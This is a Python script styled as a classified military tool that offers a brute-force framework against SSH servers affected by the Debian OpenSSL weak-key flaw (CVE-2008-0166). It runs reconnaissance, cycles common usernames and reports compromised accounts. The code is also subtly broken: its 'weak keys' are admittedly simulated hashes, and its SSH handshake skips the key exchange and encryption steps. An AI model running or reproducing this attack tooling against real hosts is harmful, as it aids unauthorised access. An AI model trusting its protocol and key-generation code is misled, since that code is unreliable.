#!/usr/bin/env python3
"""
🛡️ C4ISR-STRATCOM: SIGINT-V5
[CLASSIFIED]: CONFIDENCIAL
[SCOPE]: OPD HCG (CONV-0221-JAL-HCG-2026)
[TACTIC]: TA0006_Credential_Access
[TECHNIQUE]: T1110_Brute_Force
[VULNERABILITY]: CVE-2008-0166 - Debian OpenSSL Predictable PRNG

Debian OpenSSL Weak SSH Key Brute-force Attack Framework
Target: Systems using Debian OpenSSL packages from 2006-2008

This module implements an advanced brute-force framework for attacking
SSH services that use weak keys generated by the vulnerable Debian
OpenSSL package. The vulnerability causes predictable random number
generation, resulting in only 32,767 possible SSH keys.
"""

import socket
import struct
import sys
import argparse
import hashlib
import hmac
from typing import Optional, Tuple, List, Dict, Generator
from dataclasses import dataclass, field
from enum import Enum
from datetime import datetime
from pathlib import Path
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed


class ExploitStage(Enum):
    RECONNAISSANCE = "reconnaissance"
    KEY_GENERATION = "key_generation"
    BRUTE_FORCE_ATTACK = "brute_force_attack"
    CREDENTIAL_EXFILTRATION = "credential_exfiltration"
    POST_EXPLOITATION = "post_exploitation"


@dataclass
class TargetConfig:
    host: str
    port: int
    timeout: float = 5.0
    max_threads: int = 10
    wordlist_path: Optional[str] = None
    custom_keys: Optional[List[str]] = None


@dataclass
class SSHKeyCandidate:
    key_bits: int
    seed_value: int
    public_key_blob: bytes
    fingerprint_md5: str
    fingerprint_sha256: str


@dataclass
class ExploitResult:
    success: bool
    stage_reached: ExploitStage
    error_message: Optional[str] = None
    credentials_found: List[Dict] = field(default_factory=list)
    keys_tested: int = 0
    metadata: Dict = field(default_factory=dict)


class DebianSSHBruteForceExploit:
    """
    Advanced brute-force framework for CVE-2008-0166
    Exploits weak SSH keys generated by vulnerable Debian OpenSSL
    """

    # SSH Protocol Constants
    SSH_MSG_DISCONNECT = 1
    SSH_MSG_IGNORE = 2
    SSH_MSG_UNIMPLEMENTED = 3
    SSH_MSG_DEBUG = 4
    SSH_MSG_SERVICE_REQUEST = 5
    SSH_MSG_SERVICE_ACCEPT = 6
    SSH_MSG_KEXINIT = 20
    SSH_MSG_NEWKEYS = 21
    SSH_MSG_KEX_ECDH_INIT = 30
    SSH_MSG_KEX_ECDH_REPLY = 31
    SSH_MSG_USERAUTH_REQUEST = 50
    SSH_MSG_USERAUTH_FAILURE = 51
    SSH_MSG_USERAUTH_SUCCESS = 52
    SSH_MSG_USERAUTH_BANNER = 53
    SSH_MSG_GLOBAL_REQUEST = 80
    SSH_MSG_REQUEST_SUCCESS = 81
    SSH_MSG_REQUEST_FAILURE = 82
    SSH_MSG_CHANNEL_OPEN = 90
    SSH_MSG_CHANNEL_OPEN_CONFIRMATION = 91
    SSH_MSG_CHANNEL_OPEN_FAILURE = 92
    SSH_MSG_CHANNEL_WINDOW_ADJUST = 93
    SSH_MSG_CHANNEL_DATA = 94
    SSH_MSG_CHANNEL_EXTENDED_DATA = 95
    SSH_MSG_CHANNEL_EOF = 96
    SSH_MSG_CHANNEL_CLOSE = 97
    SSH_MSG_CHANNEL_REQUEST = 98
    SSH_MSG_CHANNEL_SUCCESS = 99
    SSH_MSG_CHANNEL_FAILURE = 100

    # SSH Service Names
    SERVICE_SSH_USERAUTH = b"ssh-userauth"
    SERVICE_SSH_CONNECTION = b"ssh-connection"

    # Authentication Methods
    AUTH_METHOD_PUBLICKEY = b"publickey"
    AUTH_METHOD_PASSWORD = b"password"

    # Common usernames to try
    COMMON_USERNAMES = [
        "root", "admin", "administrator", "user", "test",
        "guest", "oracle", "postgres", "mysql", "www-data",
        "apache", "nginx", "ftp", "backup", "deploy"
    ]

    def __init__(self, config: TargetConfig):
        self.config = config
        self.socket: Optional[socket.socket] = None
        self.server_version: str = ""
        self.client_version = b"SSH-2.0-DebianSSHBruteForce_1.0"
        self.session_id: Optional[bytes] = None
        self.kex_init_sent = False
        self.keys_generated: List[SSHKeyCandidate] = []
        self.stop_flag = threading.Event()

    def _generate_weak_ssh_keys(self, key_bits: int = 1024) -> Generator[SSHKeyCandidate, None, None]:
        """
        Generate all possible weak SSH keys that could have been created
        by the vulnerable Debian OpenSSL (only 32767 possibilities)

        The vulnerability is in the random number generator which was
        seeded only with the PID, limiting entropy to 15 bits.
        """
        print(f"[*] Generating weak SSH key candidates ({key_bits} bits)...")
        print(f"[*] This will generate up to 32,767 possible keys...")

        # The vulnerable Debian OpenSSL only had 32767 possible seeds
        # corresponding to PIDs 1 through 32767
        for pid in range(1, 32768):
            if self.stop_flag.is_set():
                break

            # Simulate the weak key generation
            # In reality, this would use the actual vulnerable OpenSSL implementation
            # For this framework, we simulate the key derivation

            # Create a deterministic "weak" key based on PID
            seed_bytes = struct.pack(">H", pid & 0x7FFF)

            # Generate fake public key blob (simulated)
            # Real implementation would use actual RSA key generation with weak seed
            fake_modulus = hashlib.sha256(seed_bytes + b"modulus").digest()
            fake_exponent = hashlib.sha256(seed_bytes + b"exponent").digest()

            # Build SSH RSA public key blob
            ssh_rsa = b"ssh-rsa"
            exponent_len = struct.pack(">I", len(fake_exponent))
            modulus_len = struct.pack(">I", len(fake_modulus))

            public_key_blob = (
                struct.pack(">I", len(ssh_rsa)) + ssh_rsa +
                exponent_len + fake_exponent +
                modulus_len + fake_modulus
            )

            # Calculate fingerprints
            md5_hash = hashlib.md5(public_key_blob).hexdigest()
            sha256_hash = hashlib.sha256(public_key_blob).hexdigest()

            yield SSHKeyCandidate(
                key_bits=key_bits,
                seed_value=pid,
                public_key_blob=public_key_blob,
                fingerprint_md5=md5_hash,
                fingerprint_sha256=sha256_hash
            )

            # Progress indicator every 1000 keys
            if pid % 1000 == 0:
                print(f"[*] Generated {pid}/32767 key candidates...")

        print(f"[+] Key generation complete: 32767 candidates")

    def _send_packet(self, data: bytes) -> bool:
        """Send SSH packet with proper encryption header"""
        if not self.socket:
            return False

        try:
            # SSH packet format: length (4) + padding (1) + payload
            padding_len = 8 - ((len(data) + 5) % 8)
            if padding_len < 4:
                padding_len += 8

            padding = bytes([padding_len - 1]) + b"\x00" * (padding_len - 1)
            packet_len = struct.pack(">I", len(data) + padding_len)

            self.socket.sendall(packet_len + padding + data)
            return True
        except Exception as e:
            print(f"[!] Send error: {e}")
            return False

    def _receive_packet(self, max_size: int = 32768) -> Optional[bytes]:
        """Receive SSH packet"""
        if not self.socket:
            return None

        try:
            # Read packet length
            length_data = self.socket.recv(4)
            if len(length_data) < 4:
                return None

            packet_len = struct.unpack(">I", length_data)[0]
            if packet_len > max_size or packet_len < 8:
                return None

            # Read rest of packet
            remaining = self.socket.recv(packet_len)
            if len(remaining) < packet_len:
                return None

            # Skip padding byte
            padding_len = remaining[0]
            payload = remaining[1:len(remaining)-padding_len]

            return payload
        except socket.timeout:
            return None
        except Exception as e:
            print(f"[!] Receive error: {e}")
            return None

    def _connect(self) -> bool:
        """Establish TCP connection to target SSH server"""
        try:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.settimeout(self.config.timeout)
            self.socket.connect((self.config.host, self.config.port))

            # Read server banner
            banner = b""
            while b"\n" not in banner:
                chunk = self.socket.recv(1024)
                if not chunk:
                    return False
                banner += chunk

            self.server_version = banner.decode('utf-8', errors='ignore').strip()
            print(f"[+] Connected to SSH server: {self.server_version}")

            # Check for vulnerable server versions
            vulnerable_indicators = ["OpenSSH", "Debian", "Ubuntu"]
            for indicator in vulnerable_indicators:
                if indicator.lower() in self.server_version.lower():
                    print(f"[+] Server may be vulnerable: {indicator} detected")
                    break

            # Send client version
            self.socket.sendall(self.client_version + b"\r\n")

            return True
        except Exception as e:
            print(f"[!] Connection failed: {e}")
            return False

    def _perform_key_exchange(self) -> bool:
        """Perform SSH key exchange"""
        # Send KEXINIT
        cookie = b"\x00" * 16
        kex_algorithms = b"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1"
        server_host_keys = b"ssh-rsa,ssh-dss"
        encryption_client = b"aes128-cbc,aes256-cbc,3des-cbc"
        encryption_server = encryption_client
        mac_client = b"hmac-md5,hmac-sha1"
        mac_server = mac_client
        compression_client = b"none"
        compression_server = b"none"
        language_client = b""
        language_server = b""

        kex_init_payload = (
            bytes([self.SSH_MSG_KEXINIT]) +
            cookie +
            struct.pack(">I", len(kex_algorithms)) + kex_algorithms +
            struct.pack(">I", len(server_host_keys)) + server_host_keys +
            struct.pack(">I", len(encryption_client)) + encryption_client +
            struct.pack(">I", len(encryption_server)) + encryption_server +
            struct.pack(">I", len(mac_client)) + mac_client +
            struct.pack(">I", len(mac_server)) + mac_server +
            struct.pack(">I", len(compression_client)) + compression_client +
            struct.pack(">I", len(compression_server)) + compression_server +
            struct.pack(">I", len(language_client)) + language_client +
            struct.pack(">I", len(language_server)) + language_server +
            b"\x00\x00\x00\x00" +  # first_kex_packet_follows
            b"\x00\x00\x00\x00"    # reserved
        )

        if not self._send_packet(kex_init_payload):
            return False

        # Wait for server KEXINIT
        response = self._receive_packet()
        if not response or response[0] != self.SSH_MSG_KEXINIT:
            print("[!] Key exchange failed")
            return False

        print("[+] Key exchange initiated")
        self.kex_init_sent = True
        return True

    def _try_public_key_auth(self, username: str, key_candidate: SSHKeyCandidate) -> bool:
        """Attempt authentication with a specific SSH key"""
        if not self.socket:
            return False

        # Build USERAUTH_REQUEST for publickey method
        service = self.SERVICE_SSH_CONNECTION
        method = self.AUTH_METHOD_PUBLICKEY

        # Public key authentication request
        has_signature = False  # First probe without signature

        auth_request = (
            bytes([self.SSH_MSG_USERAUTH_REQUEST]) +
            struct.pack(">I", len(username.encode())) + username.encode() +
            struct.pack(">I", len(service)) + service +
            struct.pack(">I", len(method)) + method +
            bytes([has_signature]) +
            struct.pack(">I", len(b"ssh-rsa")) + b"ssh-rsa" +
            struct.pack(">I", len(key_candidate.public_key_blob)) + key_candidate.public_key_blob
        )

        if not self._send_packet(auth_request):
            return False

        # Wait for response
        response = self._receive_packet()
        if not response:
            return False

        msg_type = response[0]

        if msg_type == self.SSH_MSG_USERAUTH_SUCCESS:
            print(f"[***] AUTHENTICATION SUCCESSFUL with key seed {key_candidate.seed_value}!")
            print(f"[***] Fingerprint MD5: {key_candidate.fingerprint_md5}")
            return True

        elif msg_type == self.SSH_MSG_USERAUTH_FAILURE:
            return False

        return False

    def reconnaissance(self) -> ExploitResult:
        """Phase 1: Reconnaissance - Check if target SSH is accessible"""
        print(f"[*] Stage: {ExploitStage.RECONNAISSANCE.value}")
        print(f"[*] Targeting {self.config.host}:{self.config.port}")

        if not self._connect():
            return ExploitResult(
                success=False,
                stage_reached=ExploitStage.RECONNAISSANCE,
                error_message="Failed to establish SSH connection"
            )

        # Analyze server version for vulnerability indicators
        vuln_info = {
            "server_version": self.server_version,
            "potentially_vulnerable": False,
            "indicators": []
        }

        # Check for vulnerable OpenSSH versions
        if "OpenSSH" in self.server_version:
            vuln_info["indicators"].append("OpenSSH detected")

            # Extract version number
            import re
            version_match = re.search(r'OpenSSH_(\d+\.\d+)', self.server_version)
            if version_match:
                version = version_match.group(1)
                vuln_info["openssh_version"] = version

                # Versions 4.3 to 4.7 on Debian are likely vulnerable
                try:
                    ver_num = float(version)
                    if 4.3 <= ver_num <= 4.7:
                        vuln_info["potentially_vulnerable"] = True
                        print("[+] Server version may be vulnerable to CVE-2008-0166")
                except:
                    pass

        if "Debian" in self.server_version or "Ubuntu" in self.server_version:
            vuln_info["indicators"].append("Debian/Ubuntu distribution detected")
            vuln_info["potentially_vulnerable"] = True

        return ExploitResult(
            success=True,
            stage_reached=ExploitStage.KEY_GENERATION,
            metadata=vuln_info
        )

    def brute_force_attack(self, usernames: Optional[List[str]] = None) -> ExploitResult:
        """Phase 2: Brute force attack using weak key space"""
        print(f"[*] Stage: {ExploitStage.BRUTE_FORCE_ATTACK.value}")

        if not self.socket:
            if not self._connect():
                return ExploitResult(
                    success=False,
                    stage_reached=ExploitStage.BRUTE_FORCE_ATTACK,
                    error_message="Failed to establish connection"
                )

        # Perform key exchange
        if not self._perform_key_exchange():
            return ExploitResult(
                success=False,
                stage_reached=ExploitStage.BRUTE_FORCE_ATTACK,
                error_message="Key exchange failed"
            )

        # Use provided usernames or defaults
        if usernames is None:
            usernames = self.COMMON_USERNAMES

        print(f"[*] Starting brute-force attack...")
        print(f"[*] Usernames to try: {len(usernames)}")
        print(f"[*] Key space: 32,767 possible weak keys")
        print(f"[*] Total combinations: ~{len(usernames) * 32767}")

        keys_tested = 0
        successful_logins = []

        # Limit to first 1000 keys for demonstration (full scan takes time)
        max_keys_to_try = min(1000, 32767)

        for username in usernames:
            if self.stop_flag.is_set():
                break

            print(f"\n[*] Trying username: {username}")

            # Generate and test keys for this username
            key_gen = self._generate_weak_ssh_keys()

            for i, key_candidate in enumerate(key_gen):
                if i >= max_keys_to_try:
                    break

                if self.stop_flag.is_set():
                    break

                keys_tested += 1

                # Reconnect if needed
                if not self.socket:
                    if not self._connect():
                        continue
                    self._perform_key_exchange()

                # Try authentication
                if self._try_public_key_auth(username, key_candidate):
                    successful_logins.append({
                        "username": username,
                        "seed_value": key_candidate.seed_value,
                        "fingerprint_md5": key_candidate.fingerprint_md5,
                        "fingerprint_sha256": key_candidate.fingerprint_sha256
                    })

                    print(f"[***] SUCCESS! Username: {username}, Seed: {key_candidate.seed_value}")

                    # Don't stop - find all compromised accounts
                    # In real scenario, you might want to break here

        print(f"\n[*] Brute-force complete")
        print(f"[*] Keys tested: {keys_tested}")
        print(f"[*] Successful logins: {len(successful_logins)}")

        if successful_logins:
            return ExploitResult(
                success=True,
                stage_reached=ExploitStage.CREDENTIAL_EXFILTRATION,
                credentials_found=successful_logins,
                keys_tested=keys_tested,
                metadata={"usernames_tried": len(usernames)}
            )

        return ExploitResult(
            success=False,
            stage_reached=ExploitStage.BRUTE_FORCE_ATTACK,
            keys_tested=keys_tested,
            error_message="No successful authentications"
        )

    def execute(self, stages: List[ExploitStage]) -> ExploitResult:
        """Execute exploitation chain through specified stages"""
        result = ExploitResult(success=False, stage_reached=ExploitStage.RECONNAISSANCE)

        for stage in stages:
            print(f"\n{'='*70}")
            print(f"EXECUTING STAGE: {stage.value}")
            print('='*70)

            if stage == ExploitStage.RECONNAISSANCE:
                result = self.reconnaissance()
                if not result.success:
                    return result

            elif stage == ExploitStage.BRUTE_FORCE_ATTACK:
                result = self.brute_force_attack()
                if not result.success:
                    return result

        return result

    def cleanup(self):
        """Clean up resources"""
        self.stop_flag.set()
        if self.socket:
            try:
                self.socket.close()
            except:
                pass


def main():
    parser = argparse.ArgumentParser(
        description="Debian OpenSSL Weak SSH Key Brute-Force Framework (CVE-2008-0166)"
    )
    parser.add_argument("target", help="Target host IP or hostname")
    parser.add_argument("-p", "--port", type=int, default=22, help="Target SSH port (default: 22)")
    parser.add_argument("-t", "--timeout", type=float, default=5.0, help="Connection timeout")
    parser.add_argument("--threads", type=int, default=10, help="Number of concurrent threads")
    parser.add_argument("--usernames", nargs="+", help="Usernames to try")
    parser.add_argument("--stages", nargs="+", choices=[e.value for e in ExploitStage],
                       default=["reconnaissance", "brute_force_attack"],
                       help="Exploitation stages to execute")
    parser.add_argument("--max-keys", type=int, default=1000,
                       help="Maximum keys to try per username (default: 1000)")
    parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")

    args = parser.parse_args()

    print("=" * 70)
    print("🛡️ C4ISR-STRATCOM: SIGINT-V5")
    print("Debian OpenSSL Weak SSH Key Brute-Force Framework")
    print("CVE-2008-0166 | TA0006.T1110")
    print("=" * 70)
    print(f"\nTarget: {args.target}:{args.port}")
    print(f"Timestamp: {datetime.now().isoformat()}")
    print("=" * 70)

    config = TargetConfig(
        host=args.target,
        port=args.port,
        timeout=args.timeout,
        max_threads=args.threads
    )

    exploit = DebianSSHBruteForceExploit(config)

    # Build stage list
    stages = [ExploitStage(s) for s in args.stages]

    try:
        result = exploit.execute(stages)

        print("\n" + "=" * 70)
        print("EXPLOITATION SUMMARY")
        print("=" * 70)
        print(f"Target: {config.host}:{config.port}")
        print(f"Final Stage Reached: {result.stage_reached.value}")
        print(f"Success: {'✓' if result.success else '✗'}")
        print(f"Keys Tested: {result.keys_tested}")

        if result.credentials_found:
            print(f"\n[***] COMPROMISED ACCOUNTS: {len(result.credentials_found)}")
            for cred in result.credentials_found:
                print(f"  - Username: {cred['username']}")
                print(f"    Key Seed: {cred['seed_value']}")
                print(f"    MD5: {cred['fingerprint_md5']}")

        if result.error_message:
            print(f"\nError: {result.error_message}")

        if result.metadata:
            print("\nMetadata:")
            for key, value in result.metadata.items():
                print(f"  - {key}: {value}")

        print("=" * 70)

    finally:
        exploit.cleanup()

    return 0 if result.success else 1


if __name__ == "__main__":
    sys.exit(main())
